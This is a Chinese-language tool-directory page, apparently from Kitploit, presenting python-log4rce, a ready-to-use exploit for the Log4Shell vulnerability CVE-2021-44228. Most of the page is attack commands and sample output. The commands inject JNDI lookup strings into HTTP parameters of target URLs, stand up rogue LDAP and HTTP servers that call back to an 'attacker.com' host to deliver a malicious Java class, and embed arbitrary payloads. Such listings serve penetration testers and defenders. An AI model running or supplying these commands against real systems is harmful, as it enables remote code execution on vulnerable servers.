Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
python-log4rce — 用于CVE-2021-44228的一体化纯Python PoC | Kitploit
工具/GitHubGitHub/alexandre-lavoie/python-log4rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubalexandre-lavoie/python-log4rce

python-log4rce

用于CVE-2021-44228的一体化纯Python PoC

查看仓库
178294年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Python Log4RCE

一个用于CVE-2021-44228的全能纯Python3 PoC。

示例

root@kitploit:~
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
root@kitploit:~
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

用法

这是一个CLI工具。所有选项可在帮助菜单中找到:

root@kitploit:~
python3 log4rce.py --help

列表相当广泛,因此下面将为您总结功能。

攻击模式

该工具允许您使用几种攻击模式。这些攻击是Log4RCE类的扩展。

HTTP

您可以对目标URL执行自动化的HTTP请求攻击。

您可以按如下方式执行GET请求:

root@kitploit:~
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

您可以按如下方式执行POST请求:

root@kitploit:~
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

以上操作会将JNDI标签注入到###中。

手动模式

如果无法使用上述模式,请使用此模式来获取JNDI标签:

root@kitploit:~
python3 log4rce.py manual

网络设置

该工具允许对大多数网络配置进行广泛的定制。所有内部服务器都可以修改为指向不同的位置,以适配远程设置。

HTTP服务器

您可以使用以下参数配置HTTP服务器:

root@kitploit:~
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
root@kitploit:~
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 

LDAP服务器

您可以使用以下参数配置LDAP服务器:

root@kitploit:~
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
root@kitploit:~
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 

自定义

该工具可以处理一些自定义设置。以下列出了一些您可能感兴趣的功能。

注入Payload

您可以使用以下命令将payload注入到Java类中:

root@kitploit:~
python3 log4rce.py --payload "PAYLOAD"

payload将被注入到"###"字符串中。

自定义Java Payload

您可以使用以下命令构建自己的Java类:

root@kitploit:~
javac -source 1.7 -target 1.7 /path/to/Exploit.java

生成的.class文件可以使用以下命令运行:

root@kitploit:~
python3 log4rce.py --java_class "/path/to/Exploit.class" ...

注意:您可以添加一个字符串"###"以允许payload注入。

下载工具